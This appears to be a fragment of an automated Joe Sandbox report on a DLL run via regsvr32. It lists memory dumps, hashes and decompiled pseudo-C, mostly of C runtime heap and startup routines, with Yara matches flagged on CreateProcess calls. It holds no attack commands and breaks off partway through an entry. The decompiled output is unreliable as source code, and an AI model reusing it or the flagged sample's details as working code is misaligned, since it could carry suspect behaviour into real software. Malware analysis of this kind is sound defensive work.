                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                                    • String ID: 0*C$_setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                                    • API String ID: 1648969265-1531933548
                                                                    • Opcode ID: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                                    • Instruction ID: 6f04160d34b6c1fe028a5367eccc3c8ebf9b699179af2d046024218ded9634d0
                                                                    • Opcode Fuzzy Hash: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                                    • Instruction Fuzzy Hash: 14514F31A1DB8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                                    • String ID:
                                                                    • API String ID: 3799933513-0
                                                                    • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                    • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                                                    • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                    • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                                    • API String ID: 1823725401-2473407871
                                                                    • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                    • Instruction ID: f3219d0a3466b597a7d077589c81ae53176584dcfccb647f84a4fae4f36a6977
                                                                    • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                    • Instruction Fuzzy Hash: B141A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47BA8DBBED4448B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                                      • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                                      • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                                                    • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                                                      • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                                      • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                                    • API String ID: 3828364660-3898981997
                                                                    • Opcode ID: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                                    • Instruction ID: 54e8e70dd377f15c5e8b83e2f7140eab641006b368099d9e1d163193fdf976c7
                                                                    • Opcode Fuzzy Hash: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                                    • Instruction Fuzzy Hash: 5A115E30A2D60286F3E0AB25ED4577DA6E1B784B60F215671E9EE422F5DB2FE4048611
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 50%
                                                                    			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                                    				signed int _t64;
                                                                    				intOrPtr _t66;
                                                                    				void* _t73;
                                                                    				void* _t92;
                                                                    				long long _t98;
                                                                    				long long _t113;
                                                                    				long long _t114;
                                                                    				long long _t115;
                                                                    				long long _t130;
                                                                    				intOrPtr _t132;
                                                                    				long long _t135;
                                                                    
                                                                    				if (_a136 == 1) goto 0xf9d24672;
                                                                    				_t64 = _a136 & 0x0000ffff;
                                                                    				if (_t64 == 2) goto 0xf9d24672;
                                                                    				if (_a136 == 3) goto 0xf9d24672;
                                                                    				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                                    				_a32 = "%s";
                                                                    				r9d = 0;
                                                                    				r8d = 0;
                                                                    				0xf9d2ad00();
                                                                    				if (_t64 != 1) goto 0xf9d24672;
                                                                    				asm("int3");
                                                                    				_t98 = _a128 + 0x34;
                                                                    				_a96 = _t98;
                                                                    				0xf9d2ac90(); // executed
                                                                    				_a80 = _t98;
                                                                    				if (_a80 != 0) goto 0xf9d246b8;
                                                                    				if (_a160 == 0) goto 0xf9d246b3;
                                                                    				 *_a160 = 0xc;
                                                                    				goto 0xf9d248b4;
                                                                    				_t66 =  *0xf9d4b03c; // 0x39
                                                                    				 *0xf9d4b03c = _t66 + 1;
                                                                    				if (_a64 == 0) goto 0xf9d2472d;
                                                                    				 *_a80 = 0;
                                                                    				 *((long long*)(_a80 + 8)) = 0;
                                                                    				 *((long long*)(_a80 + 0x10)) = 0;
                                                                    				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                                    				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                    				 *(_a80 + 0x1c) = 3;
                                                                    				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                                    				goto 0xf9d24844;
                                                                    				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
                                                                    				_t130 =  *0xf9d4c960; // 0x4594
                                                                    				 *0xf9d4c960 = _t130 + _a128;
                                                                    				goto 0xf9d2476e;
                                                                    				 *0xf9d4c960 = 0xffffffff;
                                                                    				_t132 =  *0xf9d4c990; // 0xa0c
                                                                    				 *0xf9d4c990 = _t132 + _a128;
                                                                    				_t113 =  *0xf9d4c978; // 0x35bc
                                                                    				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
                                                                    				if (_t92 <= 0) goto 0xf9d247a8;
                                                                    				_t114 =  *0xf9d4c990; // 0xa0c
                                                                    				 *0xf9d4c978 = _t114;
                                                                    				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
                                                                    				_t115 =  *0xf9d4c980; // 0x433b00
                                                                    				 *((long long*)(_t115 + 8)) = _a80;
                                                                    				goto 0xf9d247d0;
                                                                    				 *0xf9d4c968 = _a80;
                                                                    				_t135 =  *0xf9d4c980; // 0x433b00
                                                                    				 *_a80 = _t135;
                                                                    				 *((long long*)(_a80 + 8)) = 0;
                                                                    				 *((long long*)(_a80 + 0x10)) = _a144;
                                                                    				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                                    				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                    				 *(_a80 + 0x1c) = _a136;
                                                                    				_t78 = _a88;
                                                                    				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                                    				 *0xf9d4c980 = _a80;
                                                                    				r8d = 4;
                                                                    				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                                    				_t145 = _a128;
                                                                    				r8d = 4;
                                                                    				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                                    				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                                    				_a72 = _a80 + 0x30;
                                                                    				return E000007FE7FEF9D29360(_t73, 4);
                                                                    			}














                                                                    0x7fef9d24623
                                                                    0x7fef9d2462c
                                                                    0x7fef9d24634
                                                                    0x7fef9d2463e
                                                                    0x7fef9d24647
                                                                    0x7fef9d24653
                                                                    0x7fef9d24658
                                                                    0x7fef9d2465b
                                                                    0x7fef9d24665
                                                                    0x7fef9d2466d
                                                                    0x7fef9d2466f
                                                                    0x7fef9d2467a
                                                                    0x7fef9d2467e
                                                                    0x7fef9d24688
                                                                    0x7fef9d2468d
                                                                    0x7fef9d24698
                                                                    0x7fef9d246a3
                                                                    0x7fef9d246ad
                                                                    0x7fef9d246b3
                                                                    0x7fef9d246b8
                                                                    0x7fef9d246c0
                                                                    0x7fef9d246cb
                                                                    0x7fef9d246d2
                                                                    0x7fef9d246de
                                                                    0x7fef9d246eb
                                                                    0x7fef9d246f8
                                                                    0x7fef9d2470c
                                                                    0x7fef9d24715
                                                                    0x7fef9d24721
                                                                    0x7fef9d24728
                                                                    0x7fef9d24743
                                                                    0x7fef9d2474d
                                                                    0x7fef9d2475a
                                                                    0x7fef9d24761
                                                                    0x7fef9d24763
                                                                    0x7fef9d24776
                                                                    0x7fef9d24783
                                                                    0x7fef9d2478a
                                                                    0x7fef9d24791
                                                                    0x7fef9d24798
                                                                    0x7fef9d2479a
                                                                    0x7fef9d247a1
                                                                    0x7fef9d247b0
                                                                    0x7fef9d247b2
                                                                    0x7fef9d247be
                                                                    0x7fef9d247c2
                                                                    0x7fef9d247c9
                                                                    0x7fef9d247d5
                                                                    0x7fef9d247dc
                                                                    0x7fef9d247e4
                                                                    0x7fef9d247f9
                                                                    0x7fef9d24809
                                                                    0x7fef9d24819
                                                                    0x7fef9d24829
                                                                    0x7fef9d24831
                                                                    0x7fef9d24835
                                                                    0x7fef9d2483d
                                                                    0x7fef9d24854
                                                                    0x7fef9d2485c
                                                                    0x7fef9d2486d
                                                                    0x7fef9d2487a
                                                                    0x7fef9d24882
                                                                    0x7fef9d248a1
                                                                    0x7fef9d248af
                                                                    0x7fef9d248c7

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _unlock
                                                                    • String ID: Error: memory allocation: bad memory block type.
                                                                    • API String ID: 2480363372-1537269110
                                                                    • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                    • Instruction ID: 3c0f980f6ccd09ea8afc11027f8ae4c535623d5f1e7c019e481493293b97b3b1
                                                                    • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                    • Instruction Fuzzy Hash: 4B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: z
                                                                    • API String ID: 963392458-1375040831
                                                                    • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                    • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                                    • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                    • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: z
                                                                    • API String ID: 963392458-1375040831
                                                                    • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                    • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                                    • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                    • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer_initterm_e
                                                                    • String ID: Y
                                                                    • API String ID: 1618838664-1754117475
                                                                    • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                    • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                                                    • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                    • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 62%
                                                                    			E000007FE7FEF9D27540(long long __rax) {
                                                                    				long long _v24;
                                                                    				void* _t8;
                                                                    				void* _t9;
                                                                    
                                                                    				_t16 = __rax;
                                                                    				_t9 = E000007FE7FEF9D23D00(_t8); // executed
                                                                    				_v24 = __rax;
                                                                    				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                                    			}






                                                                    0x7fef9d27540
                                                                    0x7fef9d27544
                                                                    0x7fef9d27549
                                                                    0x7fef9d2758e

                                                                    APIs
                                                                      • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                                                    • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                                    • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                                      • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 2678799220-0
                                                                    • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                    • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                                                    • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                    • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess$AllocateHeap__crt
                                                                    • String ID:
                                                                    • API String ID: 4215626177-0
                                                                    • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                    • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                                                    • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                    • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                                    
                                                                    				_a48 = __rax;
                                                                    				if (_a48 == 0) goto 0xf9d243ad;
                                                                    				goto 0xf9d243f5;
                                                                    				if (_a88 != 0) goto 0xf9d243ce;
                                                                    				if (_a120 == 0) goto 0xf9d243c7;
                                                                    				 *_a120 = 0xc;
                                                                    				goto 0xf9d243f5;
                                                                    				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
                                                                    				if (_a120 == 0) goto 0xf9d243ef;
                                                                    				 *_a120 = 0xc;
                                                                    				goto 0xf9d243f5;
                                                                    				goto 0xf9d24377;
                                                                    				return 0;
                                                                    			}



                                                                    0x7fef9d24399
                                                                    0x7fef9d243a4
                                                                    0x7fef9d243ab
                                                                    0x7fef9d243b2
                                                                    0x7fef9d243ba
                                                                    0x7fef9d243c1
                                                                    0x7fef9d243cc
                                                                    0x7fef9d243da
                                                                    0x7fef9d243e2
                                                                    0x7fef9d243e9
                                                                    0x7fef9d243f1
                                                                    0x7fef9d243f3
                                                                    0x7fef9d243f9

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                    • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                                                    • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                    • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _ioterm
                                                                    • String ID:
                                                                    • API String ID: 4163092671-0
                                                                    • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                                    • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                                                    • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                                    • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                                                      • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                                                      • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                                      • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                                      • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                                    • String ID:
                                                                    • API String ID: 1508997487-0
                                                                    • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                                    • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                                                    • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                                    • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyHeap
                                                                    • String ID:
                                                                    • API String ID: 2435110975-0
                                                                    • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
